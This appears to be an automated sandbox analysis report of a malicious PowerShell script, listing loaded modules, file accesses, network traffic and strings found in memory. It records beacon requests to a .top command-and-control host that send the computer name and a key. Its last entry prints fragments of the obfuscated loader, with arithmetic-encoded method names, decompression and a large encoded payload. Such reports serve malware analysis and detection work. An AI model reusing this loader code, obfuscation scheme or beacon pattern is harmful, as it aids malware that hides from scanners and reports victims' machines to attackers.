Click to jump to signature section
Source: | Binary string: System.Management.Automation.pdb` source: powershell.exe, 00000000.00000002.137613990114.00000230FB7B3000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbicrosoft Irelandq source: powershell.exe, 00000000.00000002.137613990114.00000230FB761000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: t.Automation.pdbdb@8 source: powershell.exe, 00000000.00000002.137612256906.00000230FB630000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.137610309046.00000230FB280000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.137613990114.00000230FB761000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.137610309046.00000230FB280000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137612256906.00000230FB630000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137613990114.00000230FB7B3000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.137612256906.00000230FB630000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.137613990114.00000230FB7B3000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.137612256906.00000230FB6E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137613990114.00000230FB7B3000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.137612256906.00000230FB6E4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb.ps1 source: powershell.exe, 00000000.00000002.137612256906.00000230FB6E4000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA8KQ9bx1gyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=ahrQ-LC_SZ7Of9mG7QXjZpf_wOZJr4vXrlJpizjuZKF4x-KbjlBwRL7HJdcSEEPVMU1W9Q0qnhPdxv1Irf-36GJQttOMPg9J89HVOoDhN01pxBTksREng5acfABjaoiIzXz-YtdMAGnC8TRJgie_snlItVmfDj8vOVrURqGydTvfhdPMX4PqJIT5BQ87_MMGq05uaA |
Source: global traffic | HTTP traffic detected: GET /tj9wps52g1htr.php?id=computer&key=19746202345&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cmacnnkfbhlcncm.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA8KQ9bx1gyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=ahrQ-LC_SZ7Of9mG7QXjZpf_wOZJr4vXrlJpizjuZKF4x-KbjlBwRL7HJdcSEEPVMU1W9Q0qnhPdxv1Irf-36GJQttOMPg9J89HVOoDhN01pxBTksREng5acfABjaoiIzXz-YtdMAGnC8TRJgie_snlItVmfDj8vOVrURqGydTvfhdPMX4PqJIT5BQ87_MMGq05uaA |
Source: global traffic | HTTP traffic detected: GET /tj9wps52g1htr.php?id=computer&key=19746202345&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cmacnnkfbhlcncm.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA8KQ9bx1gyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=ahrQ-LC_SZ7Of9mG7QXjZpf_wOZJr4vXrlJpizjuZKF4x-KbjlBwRL7HJdcSEEPVMU1W9Q0qnhPdxv1Irf-36GJQttOMPg9J89HVOoDhN01pxBTksREng5acfABjaoiIzXz-YtdMAGnC8TRJgie_snlItVmfDj8vOVrURqGydTvfhdPMX4PqJIT5BQ87_MMGq05uaA |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E442A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$iba40z739y1rlcp/$nfe6owql0ibuxm9.php? |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E442A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137575649447.00000230E5592000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$iba40z739y1rlcp/$nfe6owql0ibuxm9.php?id=$env:computername&key=$rsbjcivwtqdkf&s=527 |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E4299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137575649447.00000230E40C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E40C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/tj9wps52g1htr.php?id=computer&key=19746202345&s=527 |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E40C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/tj9wps52g1htr.php?id=computer&key=19746202345&s=527p |
Source: powershell.exe, 00000000.00000002.137610309046.00000230FB2F4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000000.00000002.137610309046.00000230FB2D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.137611950798.00000230FB500000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micr |
Source: powershell.exe, 00000000.00000002.137602284758.00000230F31E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXzp# |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E3171000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzp# |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E4299000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E449E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E42B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E4299000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvV |
Source: powershell.exe, 00000000.00000002.137610309046.00000230FB2F4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E3171000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.137602284758.00000230F31E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.137602284758.00000230F31E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.137602284758.00000230F31E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E4299000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXzp# |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E53AC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000000.00000002.137602284758.00000230F31E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.137610309046.00000230FB2F4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E42B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137575649447.00000230E4299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137575649447.00000230E42C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:304:WilStaging_02 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $g3v0touqxl2f4wy.((-join (@((3232-3165),(45954/414),(1488-(7936768/(5602+166))),(592-(6765-(7114-820))),(8864-8780),(4832-4721))| ForEach-Object { [char]$_ })))( $gpo5ezai6d24hv7 ) $g3v0touqxl2f4wy.((-join (@((1496-1429),(5486-(-4828+(3335+6871))),(631-(5138120/9881)),(979915/(67954975/(2106+(13767-(11751-(8590-4737)))))),(597920/(4919+(-4981+(11062-(35905440/(5633196/(7669-(6693328/974)))))))))| ForEach-Object { [char]$_ })))()$6drif729juxecgq.(([char[]]@((164351/2453),(929016/8602),(5528-(12984-(908040/120))),(1070880/(67167456/7213)),(666-(4949-4384))) -join ''))()[byte[]] $o73bgwy04a2hprd = $gpo5ezai6d24hv7.(([system.String]::new(@((-3378+3462),(4009-3898),(-2202+(-7098+9365)),(393870/(10997-(13115538/1739))),(2459-(-1128+(7365-(31669204/8137)))),(3614-(12823-9306)),(-2588+2709)))))() $74wcu51lgv832dk=$o73bgwy04a2hprd return $74wcu51lgv832dk}[System.Text.Encoding]::ascii.(([system.String]::new(@((-8460+(11638-3107)),(-9789+9890),(294-178),(3119-3036),(4845-4729),(-5591+(13577-7872)),(56280/536),(9713-(19126-(7189+2334))),(742733/(10673-3462))))))((e8ldxb2uzitpq7hg3jkawmo496n "ZeN4NmIweXVrdtGloeZt4RO21jYvmdRYSp7ugviNt3JmMmYBC8YSNZN1V3FOViN6CEzuAn66Qy2A6IuWkCXhIqWUGTF9Oqr15IalXTfN/t8FCRbSaZOHwKH3tpuwDZjg2X+HSZrehZuC/YsWtDcuaVxLA4uDn5H8jb/v6ZzBhZ+ek7PmRZSG/7/TBisz2ZvMhue/qF5PAAgeg7PSAb9faf7tQMsS51/+VTaMxoDKm7zyyTpmJ1YNzodX5kjSDhHFzYvB+1Lzr59XjZABHYJFWqWqGpVQiFLBvBJsF5eFz6mhjoPqGeYTC6QqG6coBK1QU8lnzTudXNvakqTmKQBV0k/+TYzFsVXaohL8jDeswOCtGatvPCQr1HTKhAD5wKBpwZau0ar76OqoU8Mol5JdcQxuG7mE3hfGJAwJA4uuSmEwIw5aU9tWzaLE3NvKWSMXZP8TrCFPFtgcgcCeMjXHHAEJj6sb+TQDBZgERV+eRbEdkqXbaA/ZUQ3PCpLXCJnViIExzTtiNOQUszBrmH+XLqnUl8NUyxFmB2UbnRHaAlijQtDbay++e7kPEhhGoOnsLpPNA6T22x5kFUmAfBXfxrdqM6A8wfzKACTZs7hapQdAq2sa3N2Wn6+sWgcPrdXuIq58yk/GJ7NVMC9HCMG2D9RTmO8G4NgkKYFZwq7Hr7H2xQ0EzsFVRKjNtfbusUEjrCTMGqXsi7kOBspS1EtcMrbA9kCRl/VSib3mAFQu6vWVrYV2tcaO1bzJ2oBAgduHQtdOyhbIm4m+y88WFZef14WDyu6NgKS6Dp7ng+wVtGsS7by3X9p3TPxiPjw0vSG25RO/a0OgOlhD4udVQ5wNQbGYMrkcrPr0ygLnDGUlMr7Gkekx8Z6h5yEaFJ5KXez+KlgdjHdB4wfCQ5x0EKc0R9KdrFNaG7alvj1f87Xq/zflek0MUAioHDCdCl/GGPlyl9eqz1TxRRnO/OYrQ+moWluBk02VXu67T6XUfZD0VDuqAkcTCEJTIWxB6Waz1k89MxzSDBCcRRNxEqXV54joTzpmyYsCZslWflGhLbhootnRYua98oxHYHSkhEbwqh7IkJqKyrPBj4C6ve+K5VbJwy0PxHQ58ZHboeuN3oXzNsLAKLjGgJSCjTXnpguau+fclIkI+hsgWFCZ0hGOPizlksUQI67jGiv1Bnu0htmdPrvG49GN6qbmldQXyJi+yYaxqFqoHR9eT7vzhQx8m6S3ouSh3StWtIUuIWHwj/bihJ8I6XvXJTWszYTDurqADega6/q6pDifHt5waDMb2bePXlPAKZFydz5+d |